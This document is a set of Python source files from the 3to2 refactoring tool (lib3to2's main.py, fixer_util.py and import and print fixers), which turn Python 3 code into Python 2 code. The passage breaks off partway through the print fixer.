print("WARNING: %s" % (msg,), file=sys.stderr)
def main(fixer_pkg, args=None):
"""Main program.
Args:
fixer_pkg: the name of a package where the fixers are located.
args: optional; a list of command line arguments. If omitted,
sys.argv[1:] is used.
Returns a suggested exit status (0, 1, 2).
"""
# Set up option parser
parser = optparse.OptionParser(usage="3to2 [options] file|dir ...")
parser.add_option("-d", "--doctests_only", action="store_true",
help="Fix up doctests only")
parser.add_option("-f", "--fix", action="append", default=[],
help="Each FIX specifies a transformation; default: all")
parser.add_option("-j", "--processes", action="store", default=1,
type="int", help="Run 3to2 concurrently")
parser.add_option("-x", "--nofix", action="append", default=[],
help="Prevent a fixer from being run.")
parser.add_option("-l", "--list-fixes", action="store_true",
help="List available transformations (fixes/fix_*.py)")
parser.add_option("-v", "--verbose", action="store_true",
help="More verbose logging")
parser.add_option("-w", "--write", action="store_true",
help="Write back modified files")
parser.add_option("-n", "--nobackups", action="store_true", default=False,
help="Don't write backups for modified files.")
parser.add_option("--no-diffs", action="store_true",
help="Don't show diffs of the refactoring")
# Parse command line arguments
refactor_stdin = False
options, args = parser.parse_args(args)
if not options.write and options.no_diffs:
warn("not writing files and not printing diffs; that's not very useful")
if not options.write and options.nobackups:
parser.error("Can't use -n without -w")
if options.list_fixes:
print("Available transformations for the -f/--fix option:")
for fixname in refactor.get_all_fix_names(fixer_pkg):
print(fixname)
if not args:
return 0
if not args:
print("At least one file or directory argument required.", file=sys.stderr)
print("Use --help to show usage.", file=sys.stderr)
return 2
if "-" in args:
refactor_stdin = True
if options.write:
print("Can't write to stdin.", file=sys.stderr)
return 2
# Set up logging handler
level = logging.DEBUG if options.verbose else logging.INFO
logging.basicConfig(format='%(name)s: %(message)s', level=level)
# Initialize the refactoring tool
avail_fixes = set(refactor.get_fixers_from_package(fixer_pkg))
unwanted_fixes = set(fixer_pkg + ".fix_" + fix for fix in options.nofix)
explicit = set()
if options.fix:
all_present = False
for fix in options.fix:
if fix == "all":
all_present = True
else:
explicit.add(fixer_pkg + ".fix_" + fix)
requested = avail_fixes.union(explicit) if all_present else explicit
else:
requested = avail_fixes.union(explicit)
fixer_names = requested.difference(unwanted_fixes)
rt = StdoutRefactoringTool(sorted(fixer_names), None, sorted(explicit),
options.nobackups, not options.no_diffs)
# Refactor all files and directories passed as arguments
if not rt.errors:
if refactor_stdin:
rt.refactor_stdin()
else:
try:
rt.refactor(args, options.write, options.doctests_only,
options.processes)
except refactor.MultiprocessingUnsupported:
assert options.processes > 1
print("Sorry, -j isn't supported on this platform.", file=sys.stderr)
return 1
rt.summarize()
# Return error status (0 if rt.errors is zero)
return int(bool(rt.errors)) | 3to2_py3k | /3to2_py3k-1.0.tar.gz/3to2_py3k-1.0/lib3to2/main.py | main.py |
from lib2to3.pygram import token, python_symbols as syms
from lib2to3.pytree import Leaf, Node
from lib2to3.fixer_util import *
def Star(prefix=None):
return Leaf(token.STAR, '*', prefix=prefix)
def DoubleStar(prefix=None):
return Leaf(token.DOUBLESTAR, '**', prefix=prefix)
def Minus(prefix=None):
return Leaf(token.MINUS, '-', prefix=prefix)
def commatize(leafs):
"""
Accepts/turns: (Name, Name, ..., Name, Name)
Returns/into: (Name, Comma, Name, Comma, ..., Name, Comma, Name)
"""
new_leafs = []
for leaf in leafs:
new_leafs.append(leaf)
new_leafs.append(Comma())
del new_leafs[-1]
return new_leafs
def indentation(node):
"""
Returns the indentation for this node
Iff a node is in a suite, then it has indentation.
"""
while node.parent is not None and node.parent.type != syms.suite:
node = node.parent
if node.parent is None:
return ""
# The first three children of a suite are NEWLINE, INDENT, (some other node)
# INDENT.value contains the indentation for this suite
# anything after (some other node) has the indentation as its prefix.
if node.type == token.INDENT:
return node.value
elif node.prev_sibling is not None and node.prev_sibling.type == token.INDENT:
return node.prev_sibling.value
elif node.prev_sibling is None:
return ""
else:
return node.prefix
def indentation_step(node):
"""
Dirty little trick to get the difference between each indentation level
Implemented by finding the shortest indentation string
(technically, the "least" of all of the indentation strings, but
tabs and spaces mixed won't get this far, so those are synonymous.)
"""
r = find_root(node)
# Collect all indentations into one set.
all_indents = set(i.value for i in r.pre_order() if i.type == token.INDENT)
if not all_indents:
# nothing is indented anywhere, so we get to pick what we want
return " " # four spaces is a popular convention
else:
return min(all_indents)
def suitify(parent):
"""
Turn the stuff after the first colon in parent's children
into a suite, if it wasn't already
"""
for node in parent.children:
if node.type == syms.suite:
# already in the prefered format, do nothing
return
# One-liners have no suite node, we have to fake one up
for i, node in enumerate(parent.children):
if node.type == token.COLON:
break
else:
raise ValueError("No class suite and no ':'!")
# Move everything into a suite node
suite = Node(syms.suite, [Newline(), Leaf(token.INDENT, indentation(node) + indentation_step(node))])
one_node = parent.children[i+1]
one_node.remove()
one_node.prefix = ''
suite.append_child(one_node)
parent.append_child(suite)
def NameImport(package, as_name=None, prefix=None):
"""
Accepts a package (Name node), name to import it as (string), and
optional prefix and returns a node:
import <package> [as <as_name>]
"""
if prefix is None:
prefix = ""
children = [Name("import", prefix=prefix), package]
if as_name is not None:
children.extend([Name("as", prefix=" "),
Name(as_name, prefix=" ")])
return Node(syms.import_name, children)
_compound_stmts = (syms.if_stmt, syms.while_stmt, syms.for_stmt, syms.try_stmt, syms.with_stmt)
_import_stmts = (syms.import_name, syms.import_from)
def import_binding_scope(node):
"""
Generator yields all nodes for which a node (an import_stmt) has scope
The purpose of this is for a call to _find() on each of them
"""
# import_name / import_from are small_stmts
assert node.type in _import_stmts
test = node.next_sibling
# A small_stmt can only be followed by a SEMI or a NEWLINE.
while test.type == token.SEMI:
nxt = test.next_sibling
# A SEMI can only be followed by a small_stmt or a NEWLINE
if nxt.type == token.NEWLINE:
break
else:
yield nxt
# A small_stmt can only be followed by either a SEMI or a NEWLINE
test = nxt.next_sibling
# Covered all subsequent small_stmts after the import_stmt
# Now to cover all subsequent stmts after the parent simple_stmt
parent = node.parent
assert parent.type == syms.simple_stmt
test = parent.next_sibling
while test is not None:
# Yes, this will yield NEWLINE and DEDENT. Deal with it.
yield test
test = test.next_sibling
context = parent.parent
# Recursively yield nodes following imports inside of a if/while/for/try/with statement
if context.type in _compound_stmts:
# import is in a one-liner
c = context
while c.next_sibling is not None:
yield c.next_sibling
c = c.next_sibling
context = context.parent
# Can't chain one-liners on one line, so that takes care of that.
p = context.parent
if p is None:
return
# in a multi-line suite
while p.type in _compound_stmts:
if context.type == syms.suite:
yield context
context = context.next_sibling
if context is None:
context = p.parent
p = context.parent
if p is None:
break
def ImportAsName(name, as_name, prefix=None):
new_name = Name(name)
new_as = Name("as", prefix=" ")
new_as_name = Name(as_name, prefix=" ")
new_node = Node(syms.import_as_name, [new_name, new_as, new_as_name])
if prefix is not None:
new_node.prefix = prefix
return new_node
def future_import(feature, node):
root = find_root(node)
if does_tree_import("__future__", feature, node):
return
insert_pos = 0
for idx, node in enumerate(root.children):
if node.type == syms.simple_stmt and node.children and \
node.children[0].type == token.STRING:
insert_pos = idx + 1
break
for thing_after in root.children[insert_pos:]:
if thing_after.type == token.NEWLINE:
insert_pos += 1
continue
prefix = thing_after.prefix
thing_after.prefix = ""
break
else:
prefix = ""
import_ = FromImport("__future__", [Leaf(token.NAME, feature, prefix=" ")])
children = [import_, Newline()]
root.insert_child(insert_pos, Node(syms.simple_stmt, children, prefix=prefix))
def parse_args(arglist, scheme):
"""
Parse a list of arguments into a dict
"""
arglist = [i for i in arglist if i.type != token.COMMA]
ret_mapping = dict([(k, None) for k in scheme])
for i, arg in enumerate(arglist):
if arg.type == syms.argument and arg.children[1].type == token.EQUAL:
# argument < NAME '=' any >
slot = arg.children[0].value
ret_mapping[slot] = arg.children[2]
else:
slot = scheme[i]
ret_mapping[slot] = arg
return ret_mapping | 3to2_py3k | /3to2_py3k-1.0.tar.gz/3to2_py3k-1.0/lib3to2/fixer_util.py | fixer_util.py |
from lib2to3 import fixer_base
from lib2to3.fixer_util import Name, String, FromImport, Newline, Comma
from ..fixer_util import token, syms, Leaf, Node, Star, indentation, ImportAsName
TK_BASE_NAMES = ('ACTIVE', 'ALL', 'ANCHOR', 'ARC','BASELINE', 'BEVEL', 'BOTH',
'BOTTOM', 'BROWSE', 'BUTT', 'CASCADE', 'CENTER', 'CHAR',
'CHECKBUTTON', 'CHORD', 'COMMAND', 'CURRENT', 'DISABLED',
'DOTBOX', 'E', 'END', 'EW', 'EXCEPTION', 'EXTENDED', 'FALSE',
'FIRST', 'FLAT', 'GROOVE', 'HIDDEN', 'HORIZONTAL', 'INSERT',
'INSIDE', 'LAST', 'LEFT', 'MITER', 'MOVETO', 'MULTIPLE', 'N',
'NE', 'NO', 'NONE', 'NORMAL', 'NS', 'NSEW', 'NUMERIC', 'NW',
'OFF', 'ON', 'OUTSIDE', 'PAGES', 'PIESLICE', 'PROJECTING',
'RADIOBUTTON', 'RAISED', 'READABLE', 'RIDGE', 'RIGHT',
'ROUND', 'S', 'SCROLL', 'SE', 'SEL', 'SEL_FIRST', 'SEL_LAST',
'SEPARATOR', 'SINGLE', 'SOLID', 'SUNKEN', 'SW', 'StringTypes',
'TOP', 'TRUE', 'TclVersion', 'TkVersion', 'UNDERLINE',
'UNITS', 'VERTICAL', 'W', 'WORD', 'WRITABLE', 'X', 'Y', 'YES',
'wantobjects')
PY2MODULES = {
'urllib2' : (
'AbstractBasicAuthHandler', 'AbstractDigestAuthHandler',
'AbstractHTTPHandler', 'BaseHandler', 'CacheFTPHandler',
'FTPHandler', 'FileHandler', 'HTTPBasicAuthHandler',
'HTTPCookieProcessor', 'HTTPDefaultErrorHandler',
'HTTPDigestAuthHandler', 'HTTPError', 'HTTPErrorProcessor',
'HTTPHandler', 'HTTPPasswordMgr',
'HTTPPasswordMgrWithDefaultRealm', 'HTTPRedirectHandler',
'HTTPSHandler', 'OpenerDirector', 'ProxyBasicAuthHandler',
'ProxyDigestAuthHandler', 'ProxyHandler', 'Request',
'StringIO', 'URLError', 'UnknownHandler', 'addinfourl',
'build_opener', 'install_opener', 'parse_http_list',
'parse_keqv_list', 'randombytes', 'request_host', 'urlopen'),
'urllib' : (
'ContentTooShortError', 'FancyURLopener','URLopener',
'basejoin', 'ftperrors', 'getproxies',
'getproxies_environment', 'localhost', 'pathname2url',
'quote', 'quote_plus', 'splitattr', 'splithost',
'splitnport', 'splitpasswd', 'splitport', 'splitquery',
'splittag', 'splittype', 'splituser', 'splitvalue',
'thishost', 'unquote', 'unquote_plus', 'unwrap',
'url2pathname', 'urlcleanup', 'urlencode', 'urlopen',
'urlretrieve',),
'urlparse' : (
'parse_qs', 'parse_qsl', 'urldefrag', 'urljoin',
'urlparse', 'urlsplit', 'urlunparse', 'urlunsplit'),
'dbm' : (
'ndbm', 'gnu', 'dumb'),
'anydbm' : (
'error', 'open'),
'whichdb' : (
'whichdb',),
'BaseHTTPServer' : (
'BaseHTTPRequestHandler', 'HTTPServer'),
'CGIHTTPServer' : (
'CGIHTTPRequestHandler',),
'SimpleHTTPServer' : (
'SimpleHTTPRequestHandler',),
'FileDialog' : TK_BASE_NAMES + (
'FileDialog', 'LoadFileDialog', 'SaveFileDialog',
'dialogstates', 'test'),
'tkFileDialog' : (
'Directory', 'Open', 'SaveAs', '_Dialog', 'askdirectory',
'askopenfile', 'askopenfilename', 'askopenfilenames',
'askopenfiles', 'asksaveasfile', 'asksaveasfilename'),
'SimpleDialog' : TK_BASE_NAMES + (
'SimpleDialog',),
'tkSimpleDialog' : TK_BASE_NAMES + (
'askfloat', 'askinteger', 'askstring', 'Dialog'),
'SimpleXMLRPCServer' : (
'CGIXMLRPCRequestHandler', 'SimpleXMLRPCDispatcher',
'SimpleXMLRPCRequestHandler', 'SimpleXMLRPCServer',
'list_public_methods', 'remove_duplicates',
'resolve_dotted_attribute'),
'DocXMLRPCServer' : (
'DocCGIXMLRPCRequestHandler', 'DocXMLRPCRequestHandler',
'DocXMLRPCServer', 'ServerHTMLDoc','XMLRPCDocGenerator'),
}
MAPPING = { 'urllib.request' :
('urllib2', 'urllib'),
'urllib.error' :
('urllib2', 'urllib'),
'urllib.parse' :
('urllib2', 'urllib', 'urlparse'),
'dbm.__init__' :
('anydbm', 'whichdb'),
'http.server' :
('CGIHTTPServer', 'SimpleHTTPServer', 'BaseHTTPServer'),
'tkinter.filedialog' :
('tkFileDialog', 'FileDialog'),
'tkinter.simpledialog' :
('tkSimpleDialog', 'SimpleDialog'),
'xmlrpc.server' :
('DocXMLRPCServer', 'SimpleXMLRPCServer'),
}
# helps match 'http', as in 'from http.server import ...'
simple_name = "name='%s'"
# helps match 'server', as in 'from http.server import ...'
simple_attr = "attr='%s'"
# helps match 'HTTPServer', as in 'from http.server import HTTPServer'
simple_using = "using='%s'"
# helps match 'urllib.request', as in 'import urllib.request'
dotted_name = "dotted_name=dotted_name< %s '.' %s >"
# helps match 'http.server', as in 'http.server.HTTPServer(...)'
power_twoname = "pow=power< %s trailer< '.' %s > trailer< '.' using=any > any* >"
# helps match 'dbm.whichdb', as in 'dbm.whichdb(...)'
power_onename = "pow=power< %s trailer< '.' using=any > any* >"
# helps match 'from http.server import HTTPServer'
# also helps match 'from http.server import HTTPServer, SimpleHTTPRequestHandler'
# also helps match 'from http.server import *'
from_import = "from_import=import_from< 'from' %s 'import' (import_as_name< using=any 'as' renamed=any> | in_list=import_as_names< using=any* > | using='*' | using=NAME) >"
# helps match 'import urllib.request'
name_import = "name_import=import_name< 'import' (%s | in_list=dotted_as_names< imp_list=any* >) >"
#############
# WON'T FIX #
#############
# helps match 'import urllib.request as name'
name_import_rename = "name_import_rename=dotted_as_name< %s 'as' renamed=any >"
# helps match 'from http import server'
from_import_rename = "from_import_rename=import_from< 'from' %s 'import' (%s | import_as_name< %s 'as' renamed=any > | in_list=import_as_names< any* (%s | import_as_name< %s 'as' renamed=any >) any* >) >"
def all_modules_subpattern():
"""
Builds a pattern for all toplevel names
(urllib, http, etc)
"""
names_dot_attrs = [mod.split(".") for mod in MAPPING]
ret = "( " + " | ".join([dotted_name % (simple_name % (mod[0]),
simple_attr % (mod[1])) for mod in names_dot_attrs])
ret += " | "
ret += " | ".join([simple_name % (mod[0]) for mod in names_dot_attrs if mod[1] == "__init__"]) + " )"
return ret
def all_candidates(name, attr, MAPPING=MAPPING):
"""
Returns all candidate packages for the name.attr
"""
dotted = name + '.' + attr
assert dotted in MAPPING, "No matching package found."
ret = MAPPING[dotted]
if attr == '__init__':
return ret + (name,)
return ret
def new_package(name, attr, using, MAPPING=MAPPING, PY2MODULES=PY2MODULES):
"""
Returns which candidate package for name.attr provides using
"""
for candidate in all_candidates(name, attr, MAPPING):
if using in PY2MODULES[candidate]:
break
else:
candidate = None
return candidate
def build_import_pattern(mapping1, mapping2):
"""
mapping1: A dict mapping py3k modules to all possible py2k replacements
mapping2: A dict mapping py2k modules to the things they do
This builds a HUGE pattern to match all ways that things can be imported
"""
# py3k: urllib.request, py2k: ('urllib2', 'urllib')
yield from_import % (all_modules_subpattern())
for py3k, py2k in mapping1.items():
name, attr = py3k.split('.')
s_name = simple_name % (name)
s_attr = simple_attr % (attr)
d_name = dotted_name % (s_name, s_attr)
yield name_import % (d_name)
yield power_twoname % (s_name, s_attr)
if attr == '__init__':
yield name_import % (s_name)
yield power_onename % (s_name)
yield name_import_rename % (d_name)
yield from_import_rename % (s_name, s_attr, s_attr, s_attr, s_attr)
def name_import_replacement(name, attr):
children = [Name("import")]
for c in all_candidates(name.value, attr.value):
children.append(Name(c, prefix=" "))
children.append(Comma())
children.pop()
replacement = Node(syms.import_name, children)
return replacement
class FixImports2(fixer_base.BaseFix):
run_order = 4
PATTERN = " | \n".join(build_import_pattern(MAPPING, PY2MODULES))
def transform(self, node, results):
# The patterns dictate which of these names will be defined
name = results.get("name")
attr = results.get("attr")
if attr is None:
attr = Name("__init__")
using = results.get("using")
in_list = results.get("in_list")
imp_list = results.get("imp_list")
power = results.get("pow")
before = results.get("before")
after = results.get("after")
d_name = results.get("dotted_name")
# An import_stmt is always contained within a simple_stmt
simple_stmt = node.parent
# The parent is useful for adding new import_stmts
parent = simple_stmt.parent
idx = parent.children.index(simple_stmt)
if any((results.get("from_import_rename") is not None,
results.get("name_import_rename") is not None)):
self.cannot_convert(node, reason="ambiguity: import binds a single name")
elif using is None and not in_list:
# import urllib.request, single-name import
replacement = name_import_replacement(name, attr)
replacement.prefix = node.prefix
node.replace(replacement)
elif using is None:
# import ..., urllib.request, math, http.sever, ...
for d_name in imp_list:
if d_name.type == syms.dotted_name:
name = d_name.children[0]
attr = d_name.children[2]
elif d_name.type == token.NAME and d_name.value + ".__init__" in MAPPING:
name = d_name
attr = Name("__init__")
else:
continue
if name.value + "." + attr.value not in MAPPING:
continue
candidates = all_candidates(name.value, attr.value)
children = [Name("import")]
for c in candidates:
children.append(Name(c, prefix=" "))
children.append(Comma())
children.pop()
# Put in the new statement.
indent = indentation(simple_stmt)
next_stmt = Node(syms.simple_stmt, [Node(syms.import_name, children), Newline()])
parent.insert_child(idx+1, next_stmt)
parent.insert_child(idx+1, Leaf(token.INDENT, indent))
# Remove the old imported name
test_comma = d_name.next_sibling
if test_comma and test_comma.type == token.COMMA:
test_comma.remove()
elif test_comma is None:
test_comma = d_name.prev_sibling
if test_comma and test_comma.type == token.COMMA:
test_comma.remove()
d_name.remove()
if not in_list.children:
simple_stmt.remove()
elif in_list is not None:
##########################################################
# "from urllib.request import urlopen, urlretrieve, ..." #
# Replace one import statement with potentially many. #
##########################################################
packages = dict([(n,[]) for n in all_candidates(name.value,
attr.value)])
# Figure out what names need to be imported from what
# Add them to a dict to be parsed once we're completely done
for imported in using:
if imported.type == token.COMMA:
continue
if imported.type == syms.import_as_name:
test_name = imported.children[0].value
if len(imported.children) > 2:
# 'as' whatever
rename = imported.children[2].value
else:
rename = None
elif imported.type == token.NAME:
test_name = imported.value
rename = None
pkg = new_package(name.value, attr.value, test_name)
packages[pkg].append((test_name, rename))
# Parse the dict to create new import statements to replace this one
imports = []
for new_pkg, names in packages.items():
if not names:
# Didn't import anything from that package, move along
continue
new_names = []
for test_name, rename in names:
if rename is None:
new_names.append(Name(test_name, prefix=" "))
else:
new_names.append(ImportAsName(test_name, rename, prefix=" "))
new_names.append(Comma())
new_names.pop()
imports.append(FromImport(new_pkg, new_names))
# Replace this import statement with one of the others
replacement = imports.pop()
replacement.prefix = node.prefix
node.replace(replacement)
indent = indentation(simple_stmt)
# Add the remainder of the imports as new statements.
while imports:
next_stmt = Node(syms.simple_stmt, [imports.pop(), Newline()])
parent.insert_child(idx+1, next_stmt)
parent.insert_child(idx+1, Leaf(token.INDENT, indent))
elif using.type == token.STAR:
# from urllib.request import *
nodes = [FromImport(pkg, [Star(prefix=" ")]) for pkg in
all_candidates(name.value, attr.value)]
replacement = nodes.pop()
replacement.prefix = node.prefix
node.replace(replacement)
indent = indentation(simple_stmt)
while nodes:
next_stmt = Node(syms.simple_stmt, [nodes.pop(), Newline()])
parent.insert_child(idx+1, next_stmt)
parent.insert_child(idx+1, Leaf(token.INDENT, indent))
elif power is not None:
# urllib.request.urlopen
# Replace it with urllib2.urlopen
pkg = new_package(name.value, attr.value, using.value)
# Remove the trailer node that contains attr.
if attr.parent:
attr.parent.remove()
name.replace(Name(pkg, prefix=name.prefix))
elif using.type == token.NAME:
# from urllib.request import urlopen
pkg = new_package(name.value, attr.value, using.value)
if attr.value == "__init__" and pkg == name.value:
# Replacing "from abc import xyz" with "from abc import xyz"
# Just leave it alone so as not to mess with other fixers
return
else:
node.replace(FromImport(pkg, [using])) | 3to2_py3k | /3to2_py3k-1.0.tar.gz/3to2_py3k-1.0/lib3to2/fixes/imports2_fix_alt_formatting.py | imports2_fix_alt_formatting.py |
from lib2to3 import fixer_base
from lib2to3.fixer_util import Name, is_probably_builtin, Newline, does_tree_import
from lib2to3.pygram import python_symbols as syms
from lib2to3.pgen2 import token
from lib2to3.pytree import Node, Leaf
from ..fixer_util import NameImport
# used in simple_mapping_to_pattern()
MAPPING = {"reprlib": "repr",
"winreg": "_winreg",
"configparser": "ConfigParser",
"copyreg": "copy_reg",
"queue": "Queue",
"socketserver": "SocketServer",
"_markupbase": "markupbase",
"test.support": "test.test_support",
"dbm.bsd": "dbhash",
"dbm.ndbm": "dbm",
"dbm.dumb": "dumbdbm",
"dbm.gnu": "gdbm",
"html.parser": "HTMLParser",
"html.entities": "htmlentitydefs",
"http.client": "httplib",
"http.cookies": "Cookie",
"http.cookiejar": "cookielib",
# "tkinter": "Tkinter",
"tkinter.dialog": "Dialog",
"tkinter._fix": "FixTk",
"tkinter.scrolledtext": "ScrolledText",
"tkinter.tix": "Tix",
"tkinter.constants": "Tkconstants",
"tkinter.dnd": "Tkdnd",
"tkinter.__init__": "Tkinter",
"tkinter.colorchooser": "tkColorChooser",
"tkinter.commondialog": "tkCommonDialog",
"tkinter.font": "tkFont",
"tkinter.messagebox": "tkMessageBox",
"tkinter.turtle": "turtle",
"urllib.robotparser": "robotparser",
"xmlrpc.client": "xmlrpclib",
"builtins": "__builtin__",
}
# generic strings to help build patterns
# these variables mean (with http.client.HTTPConnection as an example):
# name = http
# attr = client
# used = HTTPConnection
# fmt_name is a formatted subpattern (simple_name_match or dotted_name_match)
# helps match 'queue', as in 'from queue import ...'
simple_name_match = "name='{name}'"
# helps match 'client', to be used if client has been imported from http
subname_match = "attr='{attr}'"
# helps match 'http.client', as in 'import urllib.request'
dotted_name_match = "dotted_name=dotted_name< {fmt_name} '.' {fmt_attr} >"
# helps match 'queue', as in 'queue.Queue(...)'
power_onename_match = "{fmt_name}"
# helps match 'http.client', as in 'http.client.HTTPConnection(...)'
power_twoname_match = "power< {fmt_name} trailer< '.' {fmt_attr} > any* >"
# helps match 'client.HTTPConnection', if 'client' has been imported from http
power_subname_match = "power< {fmt_attr} any* >"
# helps match 'from http.client import HTTPConnection'
from_import_match = "from_import=import_from< 'from' {fmt_name} 'import' imported=any >"
# helps match 'from http import client'
from_import_submod_match = "from_import_submod=import_from< 'from' {fmt_name} 'import' ({fmt_attr} | import_as_name< {fmt_attr} 'as' renamed=any > | import_as_names< any* ({fmt_attr} | import_as_name< {fmt_attr} 'as' renamed=any >) any* > ) >"
# helps match 'import urllib.request'
name_import_match = "name_import=import_name< 'import' {fmt_name} > | name_import=import_name< 'import' dotted_as_name< {fmt_name} 'as' renamed=any > >"
# helps match 'import http.client, winreg'
multiple_name_import_match = "name_import=import_name< 'import' dotted_as_names< names=any* > >"
def all_patterns(name):
"""
Accepts a string and returns a pattern of possible patterns involving that name
Called by simple_mapping_to_pattern for each name in the mapping it receives.
"""
# i_ denotes an import-like node
# u_ denotes a node that appears to be a usage of the name
if '.' in name:
name, attr = name.split('.', 1)
simple_name = simple_name_match.format(name=name)
simple_attr = subname_match.format(attr=attr)
dotted_name = dotted_name_match.format(fmt_name=simple_name, fmt_attr=simple_attr)
i_from = from_import_match.format(fmt_name=dotted_name)
i_from_submod = from_import_submod_match.format(fmt_name=simple_name, fmt_attr=simple_attr)
i_name = name_import_match.format(fmt_name=dotted_name)
u_name = power_twoname_match.format(fmt_name=simple_name, fmt_attr=simple_attr)
u_subname = power_subname_match.format(fmt_attr=simple_attr)
return ' | \n'.join((i_name, i_from, i_from_submod, u_name, u_subname))
else:
simple_name = simple_name_match.format(name=name)
i_name = name_import_match.format(fmt_name=simple_name)
i_from = from_import_match.format(fmt_name=simple_name)
u_name = power_onename_match.format(fmt_name=simple_name)
return ' | \n'.join((i_name, i_from, u_name))
class FixImports(fixer_base.BaseFix):
PATTERN = ' | \n'.join([all_patterns(name) for name in MAPPING])
PATTERN = ' | \n'.join((PATTERN, multiple_name_import_match))
def fix_dotted_name(self, node, mapping=MAPPING):
"""
Accepts either a DottedName node or a power node with a trailer.
If mapping is given, use it; otherwise use our MAPPING
Returns a node that can be in-place replaced by the node given
"""
if node.type == syms.dotted_name:
_name = node.children[0]
_attr = node.children[2]
elif node.type == syms.power:
_name = node.children[0]
_attr = node.children[1].children[1]
name = _name.value
attr = _attr.value
full_name = name + '.' + attr
if not full_name in mapping:
return
to_repl = mapping[full_name]
if '.' in to_repl:
repl_name, repl_attr = to_repl.split('.')
_name.replace(Name(repl_name, prefix=_name.prefix))
_attr.replace(Name(repl_attr, prefix=_attr.prefix))
elif node.type == syms.dotted_name:
node.replace(Name(to_repl, prefix=node.prefix))
elif node.type == syms.power:
_name.replace(Name(to_repl, prefix=_name.prefix))
parent = _attr.parent
_attr.remove()
parent.remove()
def fix_simple_name(self, node, mapping=MAPPING):
"""
Accepts a Name leaf.
If mapping is given, use it; otherwise use our MAPPING
Returns a node that can be in-place replaced by the node given
"""
assert node.type == token.NAME, repr(node)
if not node.value in mapping:
return
replacement = mapping[node.value]
node.replace(Leaf(token.NAME, str(replacement), prefix=node.prefix))
def fix_submod_import(self, imported, name, node):
"""
Accepts a list of NAME leafs, a name string, and a node
node is given as an argument to BaseFix.transform()
NAME leafs come from an import_as_names node (the children)
name string is the base name found in node.
"""
submods = []
missed = []
for attr in imported:
dotted = '.'.join((name, attr.value))
if dotted in MAPPING:
# get the replacement module
to_repl = MAPPING[dotted]
if '.' not in to_repl:
# it's a simple name, so use a simple replacement.
_import = NameImport(Name(to_repl, prefix=" "), attr.value)
submods.append(_import)
elif attr.type == token.NAME:
missed.append(attr.clone())
if not submods:
return
parent = node.parent
node.replace(submods[0])
if len(submods) > 1:
start = submods.pop(0)
prev = start
for submod in submods:
parent.append_child(submod)
if missed:
self.warning(node, "Imported names not known to 3to2 to be part of the package {0}. Leaving those alone... high probability that this code will be incorrect.".format(name))
children = [Name("from"), Name(name, prefix=" "), Name("import", prefix=" "), Node(syms.import_as_names, missed)]
orig_stripped = Node(syms.import_from, children)
parent.append_child(Newline())
parent.append_child(orig_stripped)
def get_dotted_import_replacement(self, name_node, attr_node, mapping=MAPPING, renamed=None):
"""
For (http, client) given and httplib being the correct replacement,
returns (httplib as client, None)
For (test, support) given and test.test_support being the replacement,
returns (test, test_support as support)
"""
full_name = name_node.value + '.' + attr_node.value
replacement = mapping[full_name]
if '.' in replacement:
new_name, new_attr = replacement.split('.')
if renamed is None:
return Name(new_name, prefix=name_node.prefix), Node(syms.dotted_as_name, [Name(new_attr, prefix=attr_node.prefix), Name('as', prefix=" "), attr_node.clone()])
else:
return Name(new_name, prefix=name_node.prefix), Name(new_attr, prefix=attr_node.prefix)
else:
return Node(syms.dotted_as_name, [Name(replacement, prefix=name_node.prefix), Name('as', prefix=' '), Name(attr_node.value, prefix=attr_node.prefix)]), None
def transform(self, node, results):
from_import = results.get("from_import")
from_import_submod = results.get("from_import_submod")
name_import = results.get("name_import")
dotted_name = results.get("dotted_name")
name = results.get("name")
names = results.get("names")
attr = results.get("attr")
imported = results.get("imported")
if names:
for name in names:
if name.type == token.NAME:
self.fix_simple_name(name)
elif name.type == syms.dotted_as_name:
self.fix_simple_name(name.children[0]) if name.children[0].type == token.NAME else \
self.fix_dotted_name(name.children[0])
elif name.type == syms.dotted_name:
self.fix_dotted_name(name)
elif from_import_submod:
renamed = results.get("renamed")
new_name, new_attr = self.get_dotted_import_replacement(name, attr, renamed=renamed)
if new_attr is not None:
name.replace(new_name)
attr.replace(new_attr)
else:
children = [Name("import"), new_name]
node.replace(Node(syms.import_name, children, prefix=node.prefix))
elif dotted_name:
self.fix_dotted_name(dotted_name)
elif name_import or from_import:
self.fix_simple_name(name)
elif name and not attr:
if does_tree_import(None, MAPPING[name.value], node):
self.fix_simple_name(name)
elif name and attr:
# Note that this will fix a dotted name that was never imported. This will probably not matter.
self.fix_dotted_name(node)
elif imported and imported.type == syms.import_as_names:
self.fix_submod_import(imported=imported.children, node=node, name=name.value) | 3to2_py3k | /3to2_py3k-1.0.tar.gz/3to2_py3k-1.0/lib3to2/fixes/fix_imports.py | fix_imports.py |
from __future__ import with_statement # Aiming for 2.5-compatible code
from lib2to3 import fixer_base
from lib2to3.pytree import Node, Leaf
from lib2to3.pygram import python_symbols as syms, token
from lib2to3.fixer_util import (Name, FromImport, Newline, Call, Comma, Dot,
LParen, RParen, touch_import)
import warnings
import sys
def gen_printargs(lst):
"""
Accepts a list of all nodes in the print call's trailer.
Yields nodes that will be easier to deal with
"""
for node in lst:
if node.type == syms.arglist:
# arglist<pos=any* kwargs=(argument<"file"|"sep"|"end" "=" any>*)>
kids = node.children
it = kids.__iter__()
try:
while True:
arg = next(it)
if arg.type == syms.argument:
# argument < "file"|"sep"|"end" "=" (any) >
yield arg
next(it)
else:
yield arg
next(it)
except StopIteration:
continue
else:
yield node
def isNone(arg):
"""
Returns True if arg is a None node
"""
return arg.type == token.NAME and arg.value == "None"
def _unicode(arg):
"""
Calls unicode() on the arg in the node.
"""
prefix = arg.prefix
arg = arg.clone()
arg.prefix = ""
ret = Call(Name("unicode", prefix=prefix), [arg])
return ret
def add_file_part(file, lst):
if file is None or isNone(file):
return
lst.append(Leaf(token.RIGHTSHIFT, ">>", prefix=" "))
lst.append(file.clone())
lst.append(Comma())
def add_sep_part(sep, pos, lst):
if sep is not None and not isNone(sep) and \
not (sep.type == token.STRING and sep.value in ("' '", '" "')):
temp = []
for arg in pos:
temp.append(_unicode(arg.clone()))
if sys.version_info >= (2, 6):
warnings.warn("Calling unicode() on what may be a bytes object")
temp.append(Comma())
del temp[-1]
sep = sep.clone()
sep.prefix = " "
args = Node(syms.listmaker, temp)
new_list = Node(syms.atom, [Leaf(token.LSQB, "["), args,
Leaf(token.RSQB, "]")])
join_arg = Node(syms.trailer, [LParen(), new_list, RParen()])
sep_join = Node(syms.power, [sep, Node(syms.trailer,
[Dot(), Name("join")])])
lst.append(sep_join)
lst.append(join_arg)
else:
if pos:
pos[0].prefix = " "
for arg in pos:
lst.append(arg.clone())
lst.append(Comma())
del lst[-1]
def add_end_part(end, file, parent, loc):
